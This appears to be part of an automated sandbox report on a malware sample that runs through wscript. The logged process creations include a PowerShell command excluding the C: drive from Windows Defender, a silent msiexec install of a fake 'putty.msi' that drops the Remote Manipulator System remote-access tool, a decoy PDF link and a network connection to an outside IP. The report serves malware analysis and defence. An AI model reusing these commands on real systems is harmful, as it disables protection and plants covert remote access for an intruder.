          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\eventmsg.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\properties.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\vp8decoder.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisdecoder.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\UNINST_Uninstall_R_3B1E3C8B7D0945898DA82CEEED02F0C7.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\server_stop_27D7873393984316BEA10FB36BB4D2F9.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrvui_rppd.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\vpdisp.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unires_vpd.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\pdfout.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\srvinst.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\msvcp120.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\vp8encoder.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\server_start_C00864331B9D4391A8A26292A601EBE2.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rppdui.dllJump to dropped file
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_39-7248
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeAPI coverage: 1.9 %
          Source: C:\Windows\System32\wscript.exe TID: 1988Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\System32\wscript.exe TID: 2572Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\wscript.exe TID: 5932Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\wscript.exe TID: 1940Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2976Thread sleep time: -4611686018427385s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340Thread sleep count: 7602 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340Thread sleep count: 1913 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3960Thread sleep time: -3689348814741908s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4056Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5000Thread sleep count: 6599 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6080Thread sleep time: -4611686018427385s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3264Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3652Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe TID: 4264Thread sleep time: -50000s >= -30000s
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe TID: 8164Thread sleep time: -240000s >= -30000s
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe TID: 940Thread sleep count: 166 > 30
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe TID: 2820Thread sleep time: -60000s >= -30000s
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe TID: 3944Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeLast function: Thread delayed
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeLast function: Thread delayed
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeThread delayed: delay time: 50000
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeThread delayed: delay time: 60000
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeThread delayed: delay time: 60000
          Source: wscript.exe, 00000005.00000003.2370423996.0000022F3B2D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWneron Bar Animation TargetLocal\Microsoft\Windows\INetCache
          Source: wscript.exe, 00000005.00000003.2369369070.0000022F40537000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2370718080.0000022F40537000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: wscript.exe, 00000005.00000003.2368148330.0000022F404D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /start

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\System32\wscript.exeNetwork Connect: 217.21.85.207 443
          Adds a directory exclusion to Windows Defender
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\putty.msi" /qn
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\putty.msi" /qn
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /silentinstall
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" -firewall
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
